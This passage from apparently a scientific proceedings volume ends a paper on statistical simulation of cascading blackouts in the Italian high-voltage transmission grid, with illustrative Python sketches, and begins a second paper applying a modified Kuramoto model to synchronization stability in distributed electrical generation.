Step 7: if problem (3)-(8) is unfeasible due to the fact that the constraint (6) is violated for some $(k, m)$ (and there are no other reasons of unfeasibility), that is, the presence of overloaded lines is the only reason of unfeasibility, record the overloaded lines and go to Step 8, otherwise go to Step 9;

Step 8: for each overloaded line $(k, m)$ generate a random number $p_1(k, m)$ uniformly distributed in $[0, 1]$. If $p_1(k, m)$ is smaller than a reference value $p_0 \in [0, 1]$, outage the overloaded line $(k, m)$ multiplying the line admittance by a small number. If at least one of the overloaded lines is outaged, shed the loads that became isolated as a consequence of the outages of the lines, and sum the power demanded by the loads shed to the value $P_S$. Go back to Step 5. If there is no outage of overloaded lines, go back to Step 6 after having relaxed the violated constraints (6) to make the problem feasible;

Step 9: if problem (3)-(8) is unfeasible, check the total power $P_{J_L}$ demanded by the load nodes $k \in J_L$. If $P_{J_L}/P_D$ is greater than a threshold, that we choose equal to 0.3 in the simulation of Section 3, shed the smallest load belonging to $J_L$, otherwise shed the smallest load of the entire network; sum the power demanded by the load shed to the value $P_S$ and go back to Step 5;

Step 10: record the blackout size measure $P_S/P_D$ and the line occupations and go back to Step 2.

The previous numerical scheme used to generate the cascade can be interpreted as follows. Steps 1, 2, 3 define the load of the network, Step 4 is an initialization step, and Step 5 verifies whether the assigned load can be served satisfying the physical constraints of the network. If this is the case the computation stops. If this is not the case, Steps 7, 8, 9 define the rules used to disconnect lines and loads in the attempt to restore feasibility. We begin disconnecting overloaded lines and, when necessary, we disconnect loads beginning from the smallest one in a suitable subset of nodes. Steps 7, 8, 9 define the blackout cascade. Finally, Steps 6 and 10 are technical steps needed to conclude the computation.

Using the procedure described in Steps 1-10 to generate the blackout we can perform a statistical analysis of the blackout size measure generated by statistically known random fluctuations of the loads, similar to the analysis presented in [4], [1], [2]. In fact, starting from a reference value of the load power vector $P^L$ (Step 2), we overload the network adding to the components of $P^L$ a random disturbance of known statistical properties (Step 3); this corresponds to changing the value of the total power demand $P_D$ randomly. In this way the resulting blackout size measure $P_S/P_D$ computed through Steps 1-10 becomes a random variable, so that after generating an appropriate statistical sample of $P_S/P_D$ we can compute an approximation of its probability density function.
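Steps 5 and 6 amount to solving the linearly constrained quadratic program (3)-(8) with the merit function (9) for the current load vector. The authors used a Fortran code running on the ENEA grid (see Section 1); the Python sketch below is only an illustration of how such a subproblem could be posed, for a hypothetical 3-node network, dropping the constant term of (9) (it does not depend on the unknowns); all data values are made up for the example.

```python
import numpy as np
from scipy.optimize import minimize

# Hypothetical 3-node network (illustrative data, not the Italian grid snapshot).
N = 3
b = np.array([[0.0, -5.0, -4.0],        # susceptances b_{k,m} (p.u.)
              [-5.0, 0.0, -3.0],
              [-4.0, -3.0, 0.0]])
Fbar = 1.5 * np.ones((N, N))            # flow limits \bar{F}_{k,m}
PGbar = np.array([2.0, 1.0, 0.0])       # generator limits \bar{P}^G_k (node 3 is a pure load)
PL = np.array([0.0, 0.0, 1.8])          # load demands P^L_k
c = np.array([1.0, 2.0, 1.0])           # generation costs c_k

def flows(theta):
    # Eq. (5): F_{k,m} = -b_{k,m} (theta_k - theta_m)
    return -b * (theta[:, None] - theta[None, :])

def objective(x):
    # Eq. (9) without the constant -W * sum((P^L_k)^2) term
    return np.sum(c * x[:N] ** 2)

constraints = [
    # Eq. (4): P^G_k - P^L_k = sum_m F_{k,m}
    {"type": "eq", "fun": lambda x: x[:N] - PL - flows(x[N:]).sum(axis=1)},
    # Eq. (8): theta_1 = 0
    {"type": "eq", "fun": lambda x: x[N]},
    # Eq. (6): |F_{k,m}| <= \bar{F}_{k,m}
    {"type": "ineq", "fun": lambda x: (Fbar - np.abs(flows(x[N:]))).ravel()},
]
bounds = [(0.0, PGbar[k]) for k in range(N)] + [(None, None)] * N   # eq. (7)

x0 = np.concatenate([np.full(N, PL.sum() / N), np.zeros(N)])
res = minimize(objective, x0, method="SLSQP", bounds=bounds, constraints=constraints)
print("feasible:", res.success, " P^G =", res.x[:N])
```

A failure reported by the solver plays here the role of the unfeasibility test of Step 5 (with the caveat that a local solver may also fail for purely numerical reasons).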
Note that for the networks studied in [1], [2] it has been shown that when the increment of $P_D$ is distributed proportionally on all the load nodes ($J_L = \{1, 2, \ldots, N\}$) and $P_D$ assumes plausible values, the probability of having large blackouts is small, and blackouts of small size are much more likely than large blackouts. That is, the probability density function of the blackout size measure $P_S/P_D$ decreases when $P_S/P_D$ increases. When the increment of $P_D$ is concentrated in a group of load nodes localized in space (the black box in Figure 1) this may change, depending on the magnitude of the total power demand increment and on the interdependence of the group of nodes considered. In fact, probability density functions with huge flat regions can be obtained (Figure 2). As suggested in [2], we use this statistical analysis to understand when the observed probability density function says that the transmission network is in critical condition. We identify the critical condition with the condition $P_D > P_D^*$, where the "critical value" $P_D^*$ is such that when $P_D/P_C$ goes across $P_D^*/P_C$ the probability density function of $P_S/P_D$ changes from being best fitted by a negative exponential function to being best fitted by an inverse power law. Note that when random fluctuations of the loads are considered, the occupation of the line $(k, m)$, $O_{k,m}$, is also a random variable, and we study its mean value, for $k, m = 1, 2, \ldots, N$ and $\overline{F}_{k,m} > 0$, as a function of the total power demand $P_D$. For $k, m = 1, 2, \ldots, N$ and $\overline{F}_{k,m} > 0$ we limit our study to the mean value of the random variable $O_{k,m}$ rather than studying its probability density function, for practical reasons. In fact, in power transmission networks of real interest (Figure 1) there are (at least) several hundreds of lines and it would be impractical to study the probability density functions of hundreds of random variables.
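To make the statistical sampling concrete, the following Python sketch shows the Monte Carlo loop implied by Steps 1-10, assuming a hypothetical routine run_cascade that implements Steps 4-10 and returns the shed power P_S together with the matrix of line occupations; the names and the interface are illustrative, not the authors' code.

```python
import numpy as np

rng = np.random.default_rng(0)

def sample_blackouts(P0L, J_L, alpha, N_E, run_cascade):
    """Steps 1-3: perturb the loads N_E times, collect P_S/P_D samples
    and the sample mean of the line occupations O_{k,m}."""
    PL_mean = P0L.copy()
    PL_mean[list(J_L)] *= 1.0 + alpha          # Step 2: localized overload
    sizes, occupations = [], []
    for _ in range(N_E):                       # Step 3: N_E simulations
        gamma = rng.uniform(0.0, 1.0, size=PL_mean.shape)
        PL = 2.0 * gamma * PL_mean             # E[2*gamma] = 1, mean load preserved
        P_D = PL.sum()
        P_S, O = run_cascade(PL)               # Steps 4-10 (assumed given)
        sizes.append(P_S / P_D)
        occupations.append(O)
    return np.array(sizes), np.mean(occupations, axis=0)
```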
3 The Numerical Study of the Italian High Voltage Power Transmission Network
Let us use the models described in Section 2 to analyze the Italian high voltage power transmission network (Figure 1). The Italian high voltage power transmission network is represented as an undirected graph made of $N_G = 117$ generator nodes (triangles), $N_L = 163$ load nodes (circles), and $N_J = 30$ junction nodes (diamonds), that is, a network made of $N = N_G + N_L + N_J = 310$ nodes and having 347 lines (see [2] for further details). Indeed the Italian high voltage network has 361 lines and among them 14 lines are double lines. We have removed these double lines as explained in Section 2. We consider the snapshot of the Italian high voltage power transmission network parameters considered in [2] and we use the normalizations of the voltage magnitude and power load vectors used in [2]. That is, since in the Italian high voltage transmission network the base power $S_0$ is equal to 750 MW and the base voltage $V_0$ is equal to 380 kV, we must normalize the voltage magnitude vector $|V|$ and the power load vector $P^L$ contained in the snapshot dividing them by 380 kV and by 750 MW, respectively.
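As a small illustration of this normalization, the base values below are the ones given in the text, while the snapshot arrays are placeholders; the snippet only sketches the per-unit conversion.

```python
import numpy as np

S0 = 750.0   # base power, MW (from the text)
V0 = 380.0   # base voltage, kV (from the text)

V_kV = np.array([380.0, 380.0, 380.0])    # snapshot voltage magnitudes (placeholder)
PL_MW = np.array([120.0, 300.0, 75.0])    # snapshot load demands (placeholder)

V_pu = V_kV / V0     # dimensionless voltages, here (1, 1, 1) as required
PL_pu = PL_MW / S0   # dimensionless p.u. loads entering problem (3)-(9)
```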
Starting from these data we perform a statistical analysis of the random variable $P_S/P_D$ defined in Section 2 using samples made of 20000 individuals ($N_E = 20000$ in the procedure described in Steps 1-10). We use samples of size 20000 since we have observed that, in the numerical experiment presented here, considering greater samples (i.e. made of $N_E > 20000$ individuals) leaves substantially unchanged the estimated probability density functions. We consider increasing values of the mean power load of the load nodes contained in the black box shown in Figure 1. Recall that the load nodes are marked as circles in Figure 1. In particular, we increase the mean power load of these load nodes choosing in Step 2 $\alpha = 0, 0.1, 0.2, 0.4, 0.8$. That is, we increase proportionally the power demand of each node in the box shown in Figure 1 (see Step 2 of the numerical scheme in Section 2) with respect to a "standard" (i.e. "expected") demand contained in the vector $P^{0,L}$. The load power demand vector $P^{0,L}$ contains the mean load power demand measured at the nodes of the Italian high voltage network. Moreover, as done in [2], we choose the probability of outaging an overloaded line equal to 30%, that is, in Step 8 we choose $p_0 = 0.3$. As discussed in [1], the choice of $p_0$ influences the properties of the blackouts generated by the scheme of Section 2. In fact, when $p_0 = 0$ there are no line outages. When $p_0 = 1$ all overloaded lines outage and the cascading blackouts generated are characterized by jumps in the load shed. Moreover, the size of these jumps can be remarkable. The choice $p_0 = 0.3$ is an intermediate choice. We approximate the probability density function of the random variable $P_S/P_D$ dividing the interval $[0, 1]$ in 20 non-overlapping subintervals of equal size, and for $i = 1, 2, \ldots, 20$ we compute the relative frequency $f_i$ in the sample of $P_S/P_D$ generated with Steps 2-10 associated to the subinterval $i$ of the random variable $P_S/P_D$ (see [2] for further details). We consider the resulting relative frequency $f_i$ associated to the center $x_i$ of the corresponding subinterval $i$, $i = 1, 2, \ldots, 20$, and we construct the histogram approximating the probability density function using the couples $(x_i, f_i)$, $i = 1, 2, \ldots, 20$ (Figure 2).
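The histogram construction just described can be sketched as follows; the 20 equal subintervals of [0, 1] and the couples (x_i, f_i) follow the text, while the function interface is an illustrative assumption.

```python
import numpy as np

def histogram_20_bins(samples):
    """samples: array of N_E blackout size measures P_S/P_D in [0, 1]."""
    edges = np.linspace(0.0, 1.0, 21)       # 20 non-overlapping subintervals
    counts, _ = np.histogram(samples, bins=edges)
    f = counts / counts.sum()               # relative frequencies f_i
    x = 0.5 * (edges[:-1] + edges[1:])      # subinterval centers x_i
    return x, f
```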
Fig. 2. Histograms approximating the probability distribution function of $P_S/P_D$ when $P_D/P_C = 0.6941$ (a) and $P_D/P_C = 0.8098$ (b)
Table 1. Least squares errors made fitting the approximations of the probability density function of $P_S/P_D$ with the exponential and with the inverse power law functions versus $P_D/P_C$

alpha    P_D/P_C    sigma_e*    sigma_p*
0        0.6767     0.1220      1.4362
0.1      0.6941     0.3419      1.2287
0.2      0.7114     0.3786      0.7206
0.4      0.74599    0.4095      0.1165
0.8      0.8098     0.4495      0.0656
We note that Figure 2 shows some flat regions in the approximated probability density functions and that the approximated probability density functions are not monotonically decreasing functions of $P_S/P_D$. These two facts seem to be associated to spatially localized load anomalies. Let us use the couples $(x_i, f_i)$, $i = 1, 2, \ldots, 20$, to analyze the behaviour of the (approximated) probability density function of the blackout size measure $P_S/P_D$ when $P_S/P_D$ increases. We fit the data $(x_i, f_i)$, $i = 1, 2, \ldots, 20$, using the negative exponential or the inverse power law, that is, using the formulae below:

$$f_1(x) = A e^{-mx}, \quad A > 0, \; m \geq 0; \qquad f_2(x) = B/x^a, \quad B > 0, \; a \geq 0, \quad 0 \leq x \leq 1, \qquad (10)$$

where $A$, $m$, $B$ and $a$ are real constants to be determined. The values of $A$, $m$, $B$ and $a$ are determined imposing that the corresponding functions (10) are the best fits of $(x_i, f_i)$, $i = 1, 2, \ldots, 20$, in the least squares sense. That is, we choose the values $A$, $m$, $B$ and $a$ that minimize respectively the following quantities:

$$\sigma_e = \sigma_e(A, m) = \sum_{i=1}^{20} |f_i - A e^{-m x_i}|^2, \qquad \sigma_p = \sigma_p(B, a) = \sum_{i=1}^{20} |f_i - B/x_i^a|^2, \qquad (11)$$

subject to the constraints on $A$, $m$, $B$, $a$ contained in (10). We denote with $\sigma_e^*$, $\sigma_p^*$ the values assumed respectively by $\sigma_e$ and $\sigma_p$ at the minimizers. The results contained in Table 1 show that when $P_D$ is small "enough" the exponential law (10) fits the data $(x_i, f_i)$, $i = 1, 2, \ldots, 20$, better than the power law (10) ($\sigma_e^* < \sigma_p^*$). However, when $P_D$ is large "enough" the situation is reversed ($\sigma_e^* > \sigma_p^*$). In particular, we are able to determine two values of $P_D$, that we denote $P_D^{(1)} = 0.7114 P_C$ and $P_D^{(2)} = 0.74599 P_C$, such that when $P_D < P_D^{(1)}$ we have $\sigma_e^* \leq \sigma_p^*$ and when $P_D > P_D^{(2)}$ we have $\sigma_e^* \geq \sigma_p^*$. We can say that in the hypotheses specified above, when the power demand $P_D$ is greater than $P_D^{(2)}$ the transmission network is in "critical" condition and when $P_D < P_D^{(1)}$ the transmission network is not in "critical" condition. Reasoning in analogy with what is done in statistical mechanics, we can conclude that this analysis suggests that in the situation described above the Italian high voltage power transmission network has a phase transition at a point $P_D^*$ such that $0.7114 \leq P_D^*/P_C \leq 0.74599$.
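A possible implementation of this classification criterion, using SciPy's nonlinear least squares fitting (the paper does not specify the fitting routine actually used; initial guesses and bounds below are illustrative):

```python
import numpy as np
from scipy.optimize import curve_fit

def fit_laws(x, f):
    """Fit (x_i, f_i) with the two laws of eq. (10) and return the
    least squares errors sigma_e*, sigma_p* of eq. (11)."""
    f_exp = lambda x, A, m: A * np.exp(-m * x)
    f_pow = lambda x, B, a: B / x ** a
    (A, m), _ = curve_fit(f_exp, x, f, p0=(1.0, 1.0),
                          bounds=([0.0, 0.0], [np.inf, np.inf]))
    (B, a), _ = curve_fit(f_pow, x, f, p0=(0.1, 1.0),
                          bounds=([0.0, 0.0], [np.inf, np.inf]))
    sigma_e = np.sum((f - f_exp(x, A, m)) ** 2)
    sigma_p = np.sum((f - f_pow(x, B, a)) ** 2)
    return sigma_e, sigma_p   # sigma_e < sigma_p suggests the noncritical regime
```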
Fig. 3. Expected value of the line occupations of a high voltage power transmission network when $P_D/P_C = 0.7114$ (a) and $P_D/P_C = 0.8098$ (b)
In [2], when the overload is distributed proportionally over all the load nodes of the network, the corresponding interval is the following: $0.74 \leq P_D^*/P_C \leq 0.77$. Finally, we study the effects produced by the increments in the mean total power demand $P_D$ on the occupation of the lines. Figure 3 shows a comparison between the mean values of the line occupations obtained when $P_D/P_C = 0.7114$ ($\alpha = 0.2$) and when $P_D/P_C = 0.8098$ ($\alpha = 0.8$), that is, for values of $P_D/P_C$ below and above the phase transition phenomenon. We can see that, in general, the mean value of the line occupation is not homogeneous, that is, the occupation of some lines is considerably greater than the occupation of the remaining lines of the network. This is due to two facts: the choice of the quadratic merit function, which strongly favours the low cost generators, and the effect due to the outage of the lines, which determines the saturation of the line occupations when $P_D/P_C$ is large enough. We note that the mean value of the line occupations when $P_D/P_C = 0.7114$ outside the black box is similar to the mean value of the line occupations of the original snapshot configuration (which has $P_D/P_C = 0.6767$), while when $P_D/P_C = 0.8098$ the mean value of the line occupations is different from that of the snapshot both inside and outside the black box. In particular, when $P_D/P_C = 0.8098$ the mean values of the line occupations of several lines are about 100%. However, Figure 3(a) shows that some lines have a mean occupation close to one also when $P_D/P_C = 0.7114$. This unbalance between the line occupations could be the origin of the possibility of large blackouts even when the mean value of the total power demand is substantially smaller than the total network capacity. The study of this vulnerability of the network should be further pursued. We note that the study of the relation between the network vulnerability and the network topology in the case of the Italian high voltage power transmission network has been started in [8].
On the website http://www.ceri.uniroma1.it/ceri/zirilli/w1 some auxiliary material that helps the understanding of [2] and of this paper is available. In particular, the website contains two animations that show the cascading blackout phenomenon at a given value of $P_D$ and the line occupation tableau as a function of $P_D$ in the case of the Italian high voltage power transmission network, when the optimal DC power flow problem (with linear merit function) is used to determine the power flow distribution and the overload is distributed proportionally over all the load nodes.
References

1. Carreras, B.A., Dobson, I., Lynch, V.E., Newman, D.E.: Critical points and transitions in an electric power transmission model for cascading failure blackout. Chaos 12, 985–994 (2002)
2. Farina, A., Graziano, A., Mariani, F., Zirilli, F.: Probabilistic analysis of failures in power transmission networks and "phase transitions": a study case of an high voltage power transmission network. Journal of Optimization Theory and its Applications 139, 171–199 (2008)
3. Andersson, G., Donalek, P., Farmer, R., Hatziargyriou, N., Kamwa, I., Kundur, P., Martins, N., Paserba, J., Pourbeik, P., Sanchez-Gasca, J., Schulz, R., Stankovic, A., Taylor, C., Vittal, V.: Causes of the 2003 major grid blackouts in North America and Europe, and recommended means to improve system dynamic performance. IEEE Transactions on Power Systems 20, 1922–1928 (2005)
4. Carreras, B.A., Dobson, I., Newman, D.E.: A loading dependent model for probabilistic cascading failure. Probability in the Engineering and Informational Sciences 19, 15–32 (2005)
5. http://www.ee.washington.edu/research/pstca/
6. Rider, M.J., Garcia, A.V., Romero, R.: Power system transmission network expansion planning using AC model. Generation, Transmission & Distribution, IET 1, 731–742 (2007)
7. http://www.afs.enea.it/project/enegrid/index.html
8. Bologna, S., Issacharoff, L., Rosato, V.: Influence of the topology on the power flux of the Italian high-voltage electrical network, http://www.giacs.org/files/wp3_files/V%20Rosato%20Europhys%20Lett%20preprint.pdf
Stability of a Distributed Generation Network Using the Kuramoto Models

Vincenzo Fioriti1, Silvia Ruzzante2, Elisa Castorini1, Elena Marchei2, and Vittorio Rosato1

1 ENEA, Casaccia Research Center, Via Anguillarese 301, 00123 S. Maria di Galeria (Rome), Italy
{vincenzo.fioriti,elisa.castorini,rosato}@casaccia.enea.it
2 ENEA, Portici Research Center, Via del Macello Vecchio, 00122 Portici, Italy
{silvia.ruzzante,elena.marchei}@portici.enea.it

Abstract. We derive a Kuramoto-like equation from the Cardell-Ilic distributed electrical generation network and use the resulting model to simulate the phase stability and the synchronization of a small electrical grid. It is well known that a major problem for distributed generation is frequency stability. This is a nonlinear problem and proper models for its analysis are sorely lacking. In our model nodes are arranged in a regular lattice; the strengths of their couplings are randomly chosen and allowed to vary as square waves. Although the system undergoes several synchronization losses, it is nevertheless able to quickly resynchronize. Moreover, we show that the synchronization rising time follows a power law.
1 Introduction
One of the most important complex Critical Infrastructures (CI), the electric power system, is evolving from a "concentrated generation" model towards a "distributed generation" (DG) model, where a large number of small power generators are integrated into the transmission (and/or the distribution) power supply system according to their availability. Large power plants (nuclear, coal, gas, etc.) will be joined by low- (or intermediate-size) power generators based on alternative sources (wind, solar, micro-hydro, biomass, geothermal, tidal, etc.). Whereas the concentrated generation model can be (in principle) more simply controlled and managed, the DG model, with geographically unevenly distributed generation plants producing electrical power as a function of the season, of the time of the day and of the meteorological conditions, does indeed introduce, in an already complex scenario, further instability issues which are worth considering. More importantly, renewable source generators inject into the network different amounts of electrical power, amounts which can be, in turn, smaller (or even much smaller) than those provided by "conventional" means (fossil sources). Developing successful grid supporting technologies for DG requires mathematical models of interconnections and control strategies able to cope with transient effects and to produce an efficient and robust distribution system.
system. Unfortunately, the connection of a large set of small- and intermediate-size generators to the generation and distribution network raises problems such as harmonic distortion of voltage [6], [11], [12], [13], stability of synchronization with the network, thermal limits, and network faults. Moreover, in the future, other technological networks will tightly interact with the DG grid, producing a tangled set of interdependencies whose final effects will undermine the stability of synchronization. Here we focus on the development of a mathematical model, based on the Kuramoto model (KM) equation [2], for the study of the stability of a DG grid. The KM is the most successful attempt to study the ubiquitous phenomenon of synchronization, in a line of work starting with Huygens and continuing through Van der Pol, Andronov, Wiener, Winfree, Kuramoto, Watanabe, and Strogatz [3]. From simple mechanical devices to complex systems, a rich variety of dynamical systems has been modelled in this way [8]: crowds of people, flocks of birds, schools of fish, associative memories, arrays of lasers, charge density waves, nonlinear control systems, Josephson junctions, plasmas, cardiac cells, power grids, epidemic spreading, and social and economic behaviours. To derive a KM model describing a network of distributed generators, we have used the Cardell-Ilic linearized dynamic model for DG, which uses the power flow connecting the network's nodes as the coupling parameter. On such a model system, we study the effects of perturbations on the synchronization of a number of power generators (modelled as oscillators with given frequencies, different phase angles, and known couplings). Our model has been inspired by a previous work by Filatrella et al. [5] on a grid model with three large generators. We base our analysis on the same assumptions, but further introduce coupling perturbations in the form of square waves with different amplitudes, in order to simulate a large coupling spread among nodes and to mimic a sudden collapse of the couplings.
2 The Kuramoto Model
In the following, for the sake of clarity, we will use the following convention: matrices will be denoted by upper-case boldface characters, while vectors will be denoted by lower-case boldface characters. Moreover, if A is a matrix, we will use the notation aij to refer to its (i, j)th entry; likewise, if x is a vector, xi will denote its ith component. The standard Kuramoto model (SKM) [1], [2], [9] is a mean-field dynamic system of coupled oscillators whose phases interact through a constant coupling as follows:

\[
\dot{\theta}_i = \omega_i + \frac{K}{N} \sum_{j=1}^{N} \sin(\theta_j - \theta_i), \qquad i = 1, \ldots, N \tag{1}
\]
where θi is the phase of the ith oscillator and depends on time t, ωi is its natural frequency (the natural frequencies are symmetrically distributed around ω0), K is the strength of the constant coupling (the same value for all links), and N is the number of oscillators. The undirected oscillator network is assumed to be fully connected.
In the case when

\[
\lim_{t \to \infty} (\theta_i - \theta_j) = 0 \tag{2}
\]
the oscillators synchronize, and their phase differences become asymptotically constant. Oscillators run independently at their natural frequencies, while the couplings tend to synchronize them all, acting like feedback. In order to measure the phase coherence, a so-called order parameter R has been introduced [2]:

\[
R = \frac{1}{N} \left| \sum_{i=1}^{N} e^{i\theta_i} \right| \tag{3}
\]
R ranges between 0 (no coherence) and 1 (perfect coherence). Kuramoto [2] showed that, for the model of (1), in the limit N → ∞ the oscillators remain unsynchronized for K < kc, while for K > kc they synchronize. If we modify the SKM by introducing a generic adjacency matrix connecting the nodes, whose generic entry Kij(t) represents a variable coupling strength between nodes and may vary as a function of time, we end up with a modified Kuramoto model equation which reads as follows:

\[
\dot{\theta}_i = \omega_i + K_m \sum_{j=1}^{N} K_{ij} \sin(\theta_j - \theta_i), \qquad i = 1, \ldots, N \tag{4}
\]
where the Kij(t) values might be randomly selected and are expressed as fractions of the maximum coupling value Km. The pertinence of the modified Kuramoto model to our purposes will be shown in the next section, where we derive the modified Kuramoto equation (4) starting from a Cardell-Ilic model of a distributed network of power generators.
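To make the modified model concrete, the following minimal numerical sketch integrates (4) with a forward Euler scheme and tracks the order parameter (3). It assumes NumPy; the node count, frequency spread, and coupling values are illustrative choices, not the parameters used in this work.

```python
import numpy as np

def simulate_modified_km(K, omega, K_m, theta0, dt=0.01, t_max=50.0):
    """Forward-Euler integration of the modified Kuramoto model (4).

    K      : (N, N) coupling matrix; entries are fractions of K_m in [0, 1]
             (held fixed here, but they may be updated at every step).
    omega  : (N,) natural frequencies.
    theta0 : (N,) initial phases.
    Returns the final phases and the time series of the order parameter (3).
    """
    theta = theta0.copy()
    n_steps = int(t_max / dt)
    R = np.empty(n_steps)
    for s in range(n_steps):
        # phase_diff[i, j] = theta_j - theta_i
        phase_diff = theta[None, :] - theta[:, None]
        theta = theta + dt * (omega + K_m * (K * np.sin(phase_diff)).sum(axis=1))
        # order parameter (3): modulus of the mean phasor
        R[s] = np.abs(np.exp(1j * theta).mean())
    return theta, R

# Illustrative run: 7 oscillators with random symmetric couplings
rng = np.random.default_rng(0)
N = 7
omega = rng.normal(1.0, 0.1, N)              # frequencies spread around omega_0 = 1
K = rng.uniform(0.0, 1.0, (N, N))
K = (K + K.T) / 2.0                          # symmetric couplings
np.fill_diagonal(K, 0.0)
theta0 = rng.uniform(0.0, 2.0 * np.pi, N)
theta, R = simulate_modified_km(K, omega, K_m=2.0, theta0=theta0)
print(f"final order parameter R = {R[-1]:.3f}")
```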
3 Derivation of the SKM from the Cardell-Ilic Model
The Cardell-Ilic model [6] is a linearized dynamic model for distributed generators (steam turbine, combustion turbine, combined cycle, wind) in a power distribution system, using a very small number of state variables and incorporating the generated power as the coupling variable among the individual models through the equation:

\[
\dot{\mathbf{x}} = \mathbf{A}\mathbf{x} - \tilde{\mathbf{K}}\boldsymbol{\omega} + \dot{\mathbf{p}} \tag{5}
\]

where \(\mathbf{x}\) is the state vector representing the physical variables of the generators according to the input-output description, \(\mathbf{A}\) is defined as the system matrix, \(\tilde{\mathbf{K}}\) is derived from the Jacobian matrix (of the linearized state equations), \(\boldsymbol{\omega}\) is the generator frequency, and \(\dot{\mathbf{p}}\) is the power output. For the ith row:

\[
\dot{x}_i = \sum_j a_{ij} x_j - \sum_j \tilde{k}_{ij} \omega_j + \dot{p}_i, \qquad i = 1, \ldots, N \tag{6}
\]

considering only the state variables regarding the phase.
Setting

\[
\dot{\theta}_i = x_i, \tag{7}
\]

\[
\dot{p}_i = -\frac{\Omega_0}{I_i}\, p_i^{\max} \sum_j \sin(\theta_j - \theta_i), \qquad i = 1, \ldots, N \tag{8}
\]

where \(I_i\) is the inertial moment, \(\Omega_0\) the nominal system frequency, and \(p_i^{\max}\) the maximum power of the ith generator, we derive that [5]:

\[
\sum_j a_{ij} \dot{\theta}_j = \sum_j \tilde{k}_{ij} \omega_j + \frac{\Omega_0}{I_i}\, p_i^{\max} \sum_j \sin(\theta_j - \theta_i), \qquad i = 1, \ldots, N \tag{9}
\]
in which we recognize the same formal structure as the Kuramoto model: on the left-hand side a linear combination of the phase derivatives, and on the right-hand side the sum of a linear combination of frequencies and sinusoidal coupling terms. Therefore, the simple, linearized Cardell-Ilic model is related to the SKM by means of the power couplings, with the phases expressed as linear combinations of the state variables of the complete distributed generation system (7). Many technical details have been neglected, but the general conclusion is that the SKM can be used to map the dynamics of a distributed generation system.
4 The Simulation of the Modified SKM
Fig. 1 (left) reports a sketch of a model of a distributed network composed of connected smaller subnetworks. Each node represents a power-generating unit; within each block, nodes are connected in a ring topology. The choice of this specific topology is motivated by a recent finding [7] that synchronization is preserved in the generic case of a graph formed by connected ring subgraphs, as on the left side of Fig. 1. While the demonstration in [7] refers to a wider topology class, we study a simple ring topology for a single block; results could then be generalized to a more general structure. Simulations have thus been carried out using the network in Fig. 1 (right). The scope of the simulations is to measure how a time-dependent coupling between nodes might affect the system's synchronization. To this purpose, we have introduced time-dependent kij in the form of square waves, with amplitudes chosen from a uniform distribution between 0 and Km and periods from 55 min down to 0.25 s, in order to simulate abrupt changes in the power. In fact, relevant problems for DG stability are dropped generators and the small inertia of the generators; both induce frequency destabilization. The physical constraint of energy conservation has been taken into account by considering a dissipation node (the black node in Fig. 1). A stringent quality-of-service requirement has been imposed to define the onset of synchronization among nodes, requiring a value of R as large as R > 0.8. Under this assumption, the critical value for the onset of the system's synchronization turns out to be Km ≈ 0.1, which will be retained as the critical threshold kc of the Kuramoto model. Below this threshold, synchronization does not take place.
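The square-wave couplings described above could be generated, for instance, as in the following sketch (NumPy assumed). It builds the ring adjacency and symmetric per-link square waves with amplitudes uniform in [0, 1] (as fractions of Km) and periods between 0.25 s and 55 min; the 50% duty cycle and the in-phase wave starts are illustrative assumptions not specified in the text.

```python
import numpy as np

def ring_adjacency(n):
    """0/1 adjacency matrix of an undirected ring of n nodes."""
    A = np.zeros((n, n))
    for i in range(n):
        A[i, (i + 1) % n] = A[(i + 1) % n, i] = 1.0
    return A

def symmetrize(M):
    """Copy the upper triangle of M onto the lower one."""
    return np.triu(M) + np.triu(M, 1).T

def square_wave_couplings(A, t, amplitudes, periods):
    """Coupling fractions K_ij(t): each link carries its amplitude during
    the first half of its period and 0 during the second half, mimicking
    a sudden collapse of the coupling.
    """
    on = ((t % periods) < periods / 2.0).astype(float)
    return A * amplitudes * on

rng = np.random.default_rng(1)
N = 7
A = ring_adjacency(N)
amplitudes = symmetrize(rng.uniform(0.0, 1.0, (N, N)))   # fractions of K_m
periods = symmetrize(rng.uniform(0.25, 3300.0, (N, N)))  # 0.25 s .. 55 min (= 3300 s)
K_t = square_wave_couplings(A, t=10.0, amplitudes=amplitudes, periods=periods)
```

Inside an integration loop such as the one sketched in Section 2, the coupling matrix would simply be recomputed from square_wave_couplings at every time step.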
Fig. 1. On the left side, the block topology of the oscillators/generators, with the dissipating node. On the right side, a single block: the network used for the simulations whose results are presented in this work.
5 Results
The network (right side of Fig. 1) has been simulated for t = 10^4 s with steps of dt = 0.05 s. Figs. 2–5 show the behavior of the phase angles θi and of the order parameter R for the low-coupling (Km = 0.1, Figs. 2, 3) and high-coupling (Km = 400, Figs. 4, 5) cases, respectively.
Fig. 2. Phases with low coupling (Km = 0.1)
Fig. 3. Order parameter R with low coupling (Km = 0.1)
Fig. 4. Phases with high coupling (Km = 400)
Fig. 5. Order parameter R with high coupling (Km = 400)
Fig. 6. Enlargement of Fig. 5, t > 5000 s, high coupling
As a general feature of the model, when the maximum coupling strength Km is low, R behaves erratically (Fig. 3), while when it increases, R rapidly goes to 1, although several crises can be observed. Phase differences θi remain almost constant (see Fig. 6). In particular:

– low coupling strength: in Fig. 3 the order parameter oscillates erratically around a mean value (different from zero) because Km is close to the critical value kc. Unfortunately, this is not sufficient to guarantee a sufficiently stable synchronization, as ⟨R⟩ < 0.8.
Fig. 7. Enlargement of Fig. 5 (between 3500 and 4000 s)
Fig. 8. Phases synchronization crisis (enlargement between 3500 and 4000 s) for Km = 400
Fig. 9. Further enlargements of the data shown in Fig. 6
– high coupling strength: the order parameter is 1 for most of the time; some deep "crises" are observed, but the system quickly recovers stability. In Fig. 5, Km = 400: as a result, R oscillates around unity. Figs. 6, 7 show successive enlargements of the phase-angle behaviour during the crisis of synchronization loss at Km = 400. It is relevant to observe that, during the synchronization losses, the phase angles tend to remain synchronized, although the spread between the phase angles grows (see Figs. 8, 9).
Fig. 10. The rising time, for Km = 4
Fig. 11. The power law: rising-time ts vs. max. coupling amplitude Km (log-log plot)
As a further finding, we have also studied the rising time (i.e., the time for R to pass from zero to unity, see Fig. 10) as a function of the value of Km; it follows a power-law pattern (Fig. 11). Moreno and Pacheco [8] found that the resynchronization time of a perturbed node decays as a power law of its degree, for the SKM in a scale-free topology. Although we consider a simple ring topology, the occurrence of two power laws may nevertheless be a clue that some kind of self-organized criticality (SOC) is at work in the KM. On the other hand, Carreras et al. [4] have suggested SOC in power grids as an explanation for blackouts. The meaning of Fig. 9 is that, when a grid is restarted after a failure or during a control action, a high value of the couplings will determine a fast re-synchronization, helping to cope with the problem of the fault clearing time.
